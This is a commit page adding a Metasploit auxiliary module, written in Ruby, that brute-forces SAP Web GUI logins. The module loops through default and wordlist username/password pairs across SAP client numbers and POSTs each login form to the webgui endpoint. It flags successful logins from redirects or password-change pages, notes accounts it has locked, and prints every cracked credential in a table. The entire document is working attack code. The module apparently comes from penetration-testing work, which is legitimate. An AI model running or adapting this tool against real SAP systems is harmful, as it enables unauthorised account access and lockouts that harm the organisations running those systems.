SAP Web GUI Brute Force
nmonkee
parent
b973927ab2
commit
92679cd1c8
|
|
@ -0,0 +1,139 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This module is based on, inspired by, or is a port of a plugin available in
|
||||||
|
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
|
||||||
|
# http://www.onapsis.com/research-free-solutions.php.
|
||||||
|
# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts
|
||||||
|
# in producing the Metasploit modules and was happy to share his knowledge and
|
||||||
|
# experience - a very cool guy. I'd also like to thank Chris John Riley,
|
||||||
|
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
|
||||||
|
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::AuthBrute
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'SAP Web GUI Brute Force',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => %q{
|
||||||
|
SAP Web GUI Brute Force.
|
||||||
|
},
|
||||||
|
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
|
||||||
|
'Author' => [ 'nmonkee' ],
|
||||||
|
'License' => BSD_LICENSE
|
||||||
|
)
|
||||||
|
register_options([
|
||||||
|
OptString.new('URI',[true, 'URI', "/"]),
|
||||||
|
OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
|
||||||
|
OptBool.new('DEFAULT_CRED',[false, 'Check using the default password and username',true]),
|
||||||
|
OptString.new('USERPASS_FILE',[false, '',nil]),
|
||||||
|
], self.class)
|
||||||
|
register_autofilter_ports([80])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
uri = datastore['URI']
|
||||||
|
if datastore['CLIENT'].nil?
|
||||||
|
print_status("Using default SAP client list")
|
||||||
|
client = ['000','001','066']
|
||||||
|
else
|
||||||
|
client = []
|
||||||
|
if datastore['CLIENT'] =~ /^\d{3},/
|
||||||
|
client = datastore['CLIENT'].split(/,/)
|
||||||
|
print_status("Brute forcing clients #{datastore['CLIENT']}")
|
||||||
|
elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
|
||||||
|
array = datastore['CLIENT'].split(/-/)
|
||||||
|
client = (array.at(0)..array.at(1)).to_a
|
||||||
|
print_status("Brute forcing clients #{datastore['CLIENT']}")
|
||||||
|
elsif datastore['CLIENT'] =~ /^\d{3}\z/
|
||||||
|
client.push(datastore['CLIENT'])
|
||||||
|
print_status("Brute forcing client #{datastore['CLIENT']}")
|
||||||
|
else
|
||||||
|
print_status("Invalid CLIENT - using default SAP client list instead")
|
||||||
|
client = ['000','001','066']
|
||||||
|
end
|
||||||
|
end
|
||||||
|
saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default,
|
||||||
|
'Header' => "[SAP] Credentials",
|
||||||
|
'Prefix' => "\n",
|
||||||
|
'Postfix' => "\n",
|
||||||
|
'Indent' => 1,
|
||||||
|
'Columns' => ["host","port","client","user","pass"])
|
||||||
|
if datastore['DEFAULT_CRED']
|
||||||
|
datastore['USERPASS_FILE'] = Msf::Config.data_directory + '/wordlists/sap_default.txt'
|
||||||
|
end
|
||||||
|
if datastore['USERPASS_FILE']
|
||||||
|
credentials = extract_word_pair(datastore['USERPASS_FILE'])
|
||||||
|
credentials.each do |u,p|
|
||||||
|
client.each do |cli|
|
||||||
|
success = bruteforce(uri,u,p,cli)
|
||||||
|
if success == true
|
||||||
|
saptbl << [ip,rport,cli,u,p]
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
else
|
||||||
|
#todo
|
||||||
|
end
|
||||||
|
print(saptbl.to_s)
|
||||||
|
end
|
||||||
|
|
||||||
|
def bruteforce(uri,user,pass,cli)
|
||||||
|
begin
|
||||||
|
path = "sap/bc/gui/sap/its/webgui/"
|
||||||
|
cookie = "Active=true; sap-usercontext=sap-language=EN&sap-client=#{cli}"
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{uri}#{path}",
|
||||||
|
'method' => 'POST',
|
||||||
|
'cookie' => cookie,
|
||||||
|
'vars_post' => {
|
||||||
|
'sap-system-login-oninputprocessing' => 'onLogin',
|
||||||
|
'sap-urlscheme' => '',
|
||||||
|
'sap-system-login' => 'onLogin',
|
||||||
|
'sap-system-login-basic_auth' => '',
|
||||||
|
'sap-system-login-cookie_disabled' => '',
|
||||||
|
'sysid' => '',
|
||||||
|
'sap-client' => cli,
|
||||||
|
'sap-user' => user,
|
||||||
|
'sap-password' => pass,
|
||||||
|
'sap-language' => 'EN',
|
||||||
|
}
|
||||||
|
})
|
||||||
|
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - Service failed to respond")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if res and res.code == 302
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
if res and res.code == 200
|
||||||
|
if res.body =~ /log on again/
|
||||||
|
return false
|
||||||
|
elsif res.body =~ /<title>Change Password - SAP Web Application Server<\/title>/
|
||||||
|
return true
|
||||||
|
elsif res.body =~ /Password logon no longer possible - too many failed attempts/
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - #{user} locked in client #{cli}")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
else
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - error trying #{user}/#{pass} against client #{cli}")
|
||||||
|
end
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
Loading…
Reference in New Issue